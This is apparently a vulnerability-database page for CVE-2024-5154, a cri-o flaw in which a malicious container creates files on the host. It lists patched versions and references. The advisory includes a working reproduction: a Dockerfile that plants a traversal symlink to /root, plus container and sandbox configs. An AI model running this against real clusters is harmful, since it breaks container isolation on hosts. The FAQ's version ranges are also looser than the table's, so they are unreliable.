CVE-2024-5154: Cri-o: malicious container can create symlink on host
First published: Mon May 13 2024(Updated: )
### Impact A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host. A workload built from this Dockerfile: ``` FROM docker.io/library/busybox as source RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc FROM scratch COPY --from=source /bin /bin COPY --from=source /lib /lib COPY --from=source /extra . ``` and this container config: ``` { "metadata": { "name": "busybox" }, "image":{ "image": "localhost/test" }, "command": [ "/bin/true" ], "linux": { } } ``` and this sandbox config ``` { "metadata": { "name": "test-sandbox", "namespace": "default", "attempt": 1, "uid": "edishd83djaideaduwk28bcsb" }, "linux": { "security_context": { "namespace_options": { "network": 2 } } } } ``` will create a file on host `/host/mtab` ### Patches 1.30.1, 1.29.5, 1.28.7 ### Workarounds Unfortunately not ### References _Are there any links users can visit to find out more?_
Credit: secalert@redhat.com secalert@redhat.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| go/github.com/cri-o/cri-o | >=1.30.0<1.30.1 | 1.30.1 |
| go/github.com/cri-o/cri-o | >=1.29.4<1.29.5 | 1.29.5 |
| go/github.com/cri-o/cri-o | >=1.28.6<1.28.7 | 1.28.7 |
| redhat/cri-o | <1.30.1 | 1.30.1 |
| redhat/cri-o | <1.29.5 | 1.29.5 |
| CRI-O | =1.28.6 | |
| CRI-O | =1.29.4 | |
| CRI-O | =1.30.0 | |
| All of | ||
| Any of | ||
| Red Hat OpenShift Container Platform | =3.11 | |
| Red Hat OpenShift Container Platform | =4.0 | |
| Red Hat OpenShift Container Platform | =4.12 | |
| Red Hat OpenShift Container Platform | =4.13 | |
| Red Hat OpenShift Container Platform | =4.14 | |
| Red Hat OpenShift Container Platform | =4.15 | |
| Any of | ||
| Red Hat Enterprise Linux | =8.0 | |
| Red Hat Enterprise Linux | =9.0 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- https://access.redhat.com/errata/RHSA-2024:3676
- https://access.redhat.com/errata/RHSA-2024:3700
- https://access.redhat.com/errata/RHSA-2024:4008
- https://access.redhat.com/errata/RHSA-2024:4486
- https://access.redhat.com/security/cve/CVE-2024-5154
- https://bugzilla.redhat.com/show_bug.cgi?id=2280190
- https://github.com/cri-o/cri-o/security/advisories/GHSA-j9hf-98c3-wrm8
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=2290762
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=2290761
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=2290763
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=2290764
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=2290765
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=2290766
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=2290767
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=2290768
- https://nvd.nist.gov/vuln/detail/CVE-2024-5154
- https://pkg.go.dev/vuln/GO-2024-2919
- https://github.com/advisories/GHSA-j9hf-98c3-wrm8 (Advisory)
- https://access.redhat.com/errata/RHSA-2024:10818
Frequently Asked Questions
What is the severity of CVE-2024-5154?
CVE-2024-5154 is classified as a high severity vulnerability.
How do I fix CVE-2024-5154?
To fix CVE-2024-5154, upgrade to cri-o versions 1.30.1, 1.29.5, or 1.28.7.
What is the impact of CVE-2024-5154?
CVE-2024-5154 allows a malicious container to influence the host system by exploiting certain code in cri-o.
Which software versions are affected by CVE-2024-5154?
CVE-2024-5154 affects cri-o versions 1.30.0 and earlier, 1.29.4 and earlier, and 1.28.6 and earlier.
Is CVE-2024-5154 exploitable in all environments?
CVE-2024-5154 may be exploitable in environments running affected versions of cri-o without the recommended patches.
- agent/first-publish-date
- agent/weakness
- agent/title
- agent/type
- agent/severity
- agent/event
- agent/author
- collector/epss-latest
- source/FIRST
- agent/epss
- agent/description
- collector/mitre-cve
- source/MITRE
- agent/references
- collector/github-advisory-latest
- source/GitHub
- alias/GHSA-j9hf-98c3-wrm8
- alias/CVE-2024-5154
- agent/software-canonical-lookup
- agent/last-modified-date
- collector/redhat-bugzilla
- source/Red Hat
- agent/trending
- collector/github-advisory
- agent/source
- agent/tags
- agent/softwarecombine
- collector/nvd-api
- source/NVD
- agent/software-canonical-lookup-request
- collector/nvd-cve
- package-manager/go
- package-manager/redhat
- vendor/kubernetes
- canonical/cri-o
- version/cri-o/1.28.6
- version/cri-o/1.29.4
- version/cri-o/1.30.0
- vendor/redhat
- canonical/red hat openshift container platform
- version/red hat openshift container platform/3.11
- version/red hat openshift container platform/4.0
- version/red hat openshift container platform/4.12
- version/red hat openshift container platform/4.13
- version/red hat openshift container platform/4.14
- version/red hat openshift container platform/4.15
- canonical/red hat enterprise linux
- version/red hat enterprise linux/8.0
- version/red hat enterprise linux/9.0